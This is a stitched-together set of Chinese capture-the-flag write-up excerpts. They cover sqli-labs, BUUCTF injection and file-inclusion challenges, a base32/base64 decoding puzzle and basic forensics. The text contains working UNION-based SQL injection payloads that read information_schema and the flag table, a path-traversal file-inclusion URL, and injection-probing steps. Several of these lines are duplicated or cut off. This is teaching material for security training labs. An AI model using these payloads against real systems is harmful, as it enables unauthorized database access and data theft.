id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='flag'--+ ?id=0' union select 1,2,group_concat(flag) from ctftraining.flag--+ __EOF__
id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='flag'--+ ?id=0' union select 1,2,group_concat(flag) from ctftraining.flag--+ __EOF__
sqli labs less 23 看到题目根据提示输入id。 输入id=1 正常 输入id=1’ 报错,如下图: 知道是单引号闭合语句。 接下来按照一般的套路来输入:id=-1’ or 1 --+ 报错信息如下。 从这个报错信息看出来是在单引号地方出错,可能是语句没有闭合。再加一个括号看看能不能报出更多的语句信息。 输入:id=-1’)...
看着像是base编码格式 通过测试发现是套加密(二次加密) 首先使用base32对此编码进行解码 base32解码 c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw== 两个等号base64编码无疑了 base64解码 得到一段SQL查询语句 select * from user where username = '$name' 通过对这段SQL语句的初步判断 ...
首先试一下弱口令,admin,123 提示用户名密码错了 既然是第一道题,那应该是很简单了 判断是数字型还是字符型 数字型 代码语言:javascript 复制 and1=1回显正常 and1=2返回异常,存在数字型注入可能 字符型 代码语言:javascript 复制 1返回正常1' 返回异常,存在字符型注入可能 ...
【摘要】 buuctf解题记录 Basic 1、 Linux labsSsh连接查看目录 2、BUU LFI COURSE 1打开环境 是一道文件包含题 进行get传参构造payload: http://c0577f81-9c9f-47d3-8049-7f07fe3de64f.node4.buuoj.cn:81/?file=../../flag 得到flag 3、BUU BRUTE 1打开环境,是一... ...
摘要:file header 可以很直接地看到文件头丢失,找一个正常的png文件把文件头复制粘贴过来即可 basic-forensics 堂吉诃德英文版电子书,有空倒是可以看看 直接ctrl+f就出了 File Carving 简单,binwalk跑一下,出来一个hidden_binary,winhex查 阅读全文 » [...